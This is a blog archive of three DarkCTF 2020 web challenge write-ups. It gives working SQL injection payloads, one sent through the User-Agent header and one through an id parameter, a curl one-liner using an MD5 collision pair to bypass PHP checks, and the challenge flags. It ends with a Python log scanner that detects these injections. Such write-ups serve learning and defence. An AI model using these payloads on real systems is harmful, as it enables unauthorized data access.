Archives of tag web


DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don't know which one. Can u help me to find it?

http://agent.darkarmy.xyz/

flag format darkCTF{databasename}

Solution

The page source reveals that the default credentials are admin/admin.

After login the site displays my User-Agent, so my first idea was to attempt SQL injection through the User-Agent header.

After a few attempts I finally ended up with the User-Agent value below ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!

darkCTF{ag3nt_u_1s_v3ry_t3l3nt3d}

DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web

Solution

We started with some PHP code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>
</head>
<body>
    

    <style>
        body{
            background-color: whitesmoke
        }
    </style>
<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?>
</body>
</html> 

There are a bunch of ifs that need to be satisfied before getting the flag:

- the darkctf parameter must be set to 2020
- the User-Agent must be set to 2020_the_best_year_corona (the result of base64-decoding the string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- the ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (the base64-encoded, not decoded!!, form of the string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the trickiest one: the karma and 2020 parameters must not be equal, but their md5 hashes need to be the same, so we need two different strings that produce a hash collision

I supplied the karma and 2020 parameters as hex codes and decoded them into the right strings with xxd on the fly, because bash does not handle non-printable characters well. The flag was obtained with the following one-liner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "http://php.darkarmy.xyz:7001/?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09" --verbose

DarkCTF{very_nice_web_challenge_dark_ctf}

DarkCTF 2020: Web/So_Simple

Web/So_Simple

173 points

"Try Harder" may be You get flag manually

Try id as parameter

http://web.darkarmy.xyz:30001

Solution

After spending some time preparing an SQL injection payload, I finally managed to create a working one.

http://sosimple.darkarmy.xyz/?id=0%27%20UNION%20ALL%20SELECT%20ID,username,password%20FROM%20users%20WHERE%20username%20like%20%22%{%%22%20OR%20password%20like%20%22%{%%22%20LIMIT%201,2;%20--%20

darkCTF{uniqu3_ide4_t0_find_fl4g}
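
A defender's view of the two SQL injection write-ups on this page (Agent-U through the User-Agent header, So_Simple through the id parameter), as an added example that is not part of the original posts: a small access-log scanner that checks both the request target and the User-Agent field. The log lines, IP addresses, timestamps and rule names are constructed for illustration; the two payloads are the ones quoted above.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: "METHOD target PROTO" status size "referer" "user-agent"
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
                  r'"[^"]*" "(?P<agent>.*)"$')

# Heuristic signatures for the two injection styles in the write-ups.
RULES = {
    "error-based XML function": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\b", re.I),
    "UNION SELECT": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "quote then SQL comment": re.compile(r"'.*--\s"),
}

def scan(lines):
    """Return (line_no, field, [rule names]) for each suspicious field."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LINE.search(line)
        if not m:
            continue
        # The request target is percent-encoded in logs; headers are logged raw.
        fields = {"target": unquote_plus(m["target"]), "agent": m["agent"]}
        for field, value in fields.items():
            matched = [name for name, rx in RULES.items() if rx.search(value)]
            if matched:
                hits.append((no, field, matched))
    return hits

# Constructed sample log (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = """
192.0.2.7 - - [26/Sep/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/80.0"
192.0.2.10 - - [26/Sep/2020:10:00:05 +0000] "POST /index.php HTTP/1.1" 200 812 "-" "', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- ."
192.0.2.10 - - [26/Sep/2020:10:02:11 +0000] "GET /?id=0%27%20UNION%20ALL%20SELECT%20ID,username,password%20FROM%20users%20WHERE%20username%20like%20%22%{%%22%20OR%20password%20like%20%22%{%%22%20LIMIT%201,2;%20--%20 HTTP/1.1" 200 530 "-" "curl/7.68.0"
192.0.2.7 - - [26/Sep/2020:10:03:40 +0000] "GET /?id=3 HTTP/1.1" 200 498 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/80.0"
""".strip().splitlines()

if __name__ == "__main__":
    for no, field, rules in scan(SAMPLE_LOG):
        print(f"line {no}: {field}: {', '.join(rules)}")
```

A scanner that inspected only the URL would miss line 2 entirely, which is why the header fields are checked as well.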